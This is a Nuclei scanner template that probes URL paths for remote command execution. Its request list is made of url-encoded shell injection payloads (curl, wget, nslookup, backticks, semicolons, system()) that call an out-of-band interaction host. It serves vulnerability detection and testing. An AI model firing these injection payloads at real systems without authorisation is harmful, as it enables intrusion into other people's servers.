id: rce-uri-finder-via-collaborator

info:
  name: RCE in URI
  description: RCE in URI
  author: reewardius
  severity: critical
  tags: rce,generic
  
http:
  - method: GET
    path:
      - "{{BaseURL}}/{{url_encode($(curl {{interactsh-url}}))}}"
      - "{{BaseURL}}/{{url_encode($(nslookup {{interactsh-url}})%00)}}"	  
      - "{{BaseURL}}/{{url_encode($(nslookup {{interactsh-url}}))}}"
      - "{{BaseURL}}/{{url_encode($(nslookup {{interactsh-url}}).aspx)}}"
      - "{{BaseURL}}/{{url_encode($(nslookup {{interactsh-url}}).html)}}"
      - "{{BaseURL}}/{{url_encode($(nslookup {{interactsh-url}}).jsp)}}"
      - "{{BaseURL}}/{{url_encode($(nslookup {{interactsh-url}}).php)}}"
      - "{{BaseURL}}/{{url_encode($(wget {{interactsh-url}}))}}"
      - "{{BaseURL}}/{{url_encode($;nslookup {{interactsh-url}})}}"
      - "{{BaseURL}}/{{url_encode(%0a nslookup {{interactsh-url}}%0a)}}"
      - "{{BaseURL}}/{{url_encode(& nslookup {{interactsh-url}}&)}}"
      - "{{BaseURL}}/{{url_encode(; curl {{interactsh-url}}#)}}"
      - "{{BaseURL}}/{{url_encode(; nslookup {{interactsh-url}}#)}}"
      - "{{BaseURL}}/{{url_encode(;curl {{interactsh-url}}#)}}"
      - "{{BaseURL}}/{{url_encode(;nslookup {{interactsh-url}}#)}}"
      - "{{BaseURL}}/{{url_encode(;system('nslookup {{interactsh-url}}');)}}"
      - "{{BaseURL}}/{{url_encode(`curl {{interactsh-url}}`)}}"
      - "{{BaseURL}}/{{url_encode(`nslookup {{interactsh-url}}`)}}"
      - "{{BaseURL}}/{{url_encode(`wget {{interactsh-url}}`)}}"
      - "{{BaseURL}}/{{url_encode(a)));nslookup {{interactsh-url}})}}"
      - "{{BaseURL}}/{{url_encode(a));nslookup {{interactsh-url}})}}"
      - "{{BaseURL}}/{{url_encode(a);nslookup {{interactsh-url}})}}"
      - "{{BaseURL}}/;{{url_encode($(curl {{interactsh-url}}))}}"
      - "{{BaseURL}}/;{{url_encode($(nslookup {{interactsh-url}})%00)}}"	  
      - "{{BaseURL}}/;{{url_encode($(nslookup {{interactsh-url}}))}}"
      - "{{BaseURL}}/;{{url_encode($(nslookup {{interactsh-url}}).aspx)}}"
      - "{{BaseURL}}/;{{url_encode($(nslookup {{interactsh-url}}).html)}}"
      - "{{BaseURL}}/;{{url_encode($(nslookup {{interactsh-url}}).jsp)}}"
      - "{{BaseURL}}/;{{url_encode($(nslookup {{interactsh-url}}).php)}}"
      - "{{BaseURL}}/;{{url_encode($(wget {{interactsh-url}}))}}"
      - "{{BaseURL}}/;{{url_encode($;nslookup {{interactsh-url}})}}"
      - "{{BaseURL}}/;{{url_encode(%0a nslookup {{interactsh-url}}%0a)}}"
      - "{{BaseURL}}/;{{url_encode(& nslookup {{interactsh-url}}&)}}"
      - "{{BaseURL}}/;{{url_encode(; curl {{interactsh-url}}#)}}"
      - "{{BaseURL}}/;{{url_encode(; nslookup {{interactsh-url}}#)}}"
      - "{{BaseURL}}/;{{url_encode(;curl {{interactsh-url}}#)}}"
      - "{{BaseURL}}/;{{url_encode(;nslookup {{interactsh-url}}#)}}"
      - "{{BaseURL}}/;{{url_encode(;system('nslookup {{interactsh-url}}');)}}"
      - "{{BaseURL}}/;{{url_encode(`curl {{interactsh-url}}`)}}"
      - "{{BaseURL}}/;{{url_encode(`nslookup {{interactsh-url}}`)}}"
      - "{{BaseURL}}/;{{url_encode(`wget {{interactsh-url}}`)}}"
      - "{{BaseURL}}/;{{url_encode(a)));nslookup {{interactsh-url}})}}"
      - "{{BaseURL}}/;{{url_encode(a));nslookup {{interactsh-url}})}}"
      - "{{BaseURL}}/;{{url_encode(a);nslookup {{interactsh-url}})}}"

    stop-at-first-match: true
    matchers:
      - type: word
        part: interactsh_protocol 
        words:
          - "http"
          - "dns"